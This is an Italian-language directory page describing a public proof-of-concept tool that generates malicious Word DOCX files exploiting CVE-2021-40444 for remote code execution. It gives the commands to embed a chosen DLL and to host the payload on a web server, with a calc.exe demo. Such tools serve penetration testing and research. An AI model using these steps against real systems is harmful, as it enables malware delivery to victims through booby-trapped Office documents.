Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-40444 — Generatore di DOCX dannosi che sfrutta CVE-2021-40444 per l'esecuzione di codice remoto tramite documenti Office appositamente creati, con server di hosting integrato per la consegna del payload. | Kitploit
Strumenti/GitHubGitHub/hqdat809/cve-2021-40444
Generazione di PayloadExploitReverse EngineeringSfruttamento di Applicazioni WebAnalisi MalwarePenetration Testing
GitHubhqdat809/cve-2021-40444

CVE-2021-40444

Generatore di DOCX dannosi che sfrutta CVE-2021-40444 per l'esecuzione di codice remoto tramite documenti Office appositamente creati, con server di hosting integrato per la consegna del payload.

Vedi Repository
153 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-40444 PoC

Generatore di documenti docx dannosi per sfruttare CVE-2021-40444 (Esecuzione di codice in remoto in Microsoft Office Word)

La creazione di questo script si basa su un po' di reverse engineering del campione utilizzato in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (file docx)

Devi installare lcab prima (sudo apt-get install lcab)

Controlla REPRODUCE.md per i passaggi di riproduzione manuale

Se il tuo cab generato non funziona, prova a puntare l'URL di exploit.html a calc.cab

Utilizzo

Prima genera un documento docx dannoso dato una DLL, puoi usare quello in test/calc.dll che apre semplicemente una calc.exe tramite una chiamata a system()

python3 exploit.py generate test/calc.dll http://<SRV IP>

Generazione del documento

Una volta generato il docx dannoso (sarà in out/) puoi avviare il server:

sudo python3 exploit.py host 80

Server

Infine prova il docx in una macchina virtuale Windows:

Apri Calc

Scarica lo strumento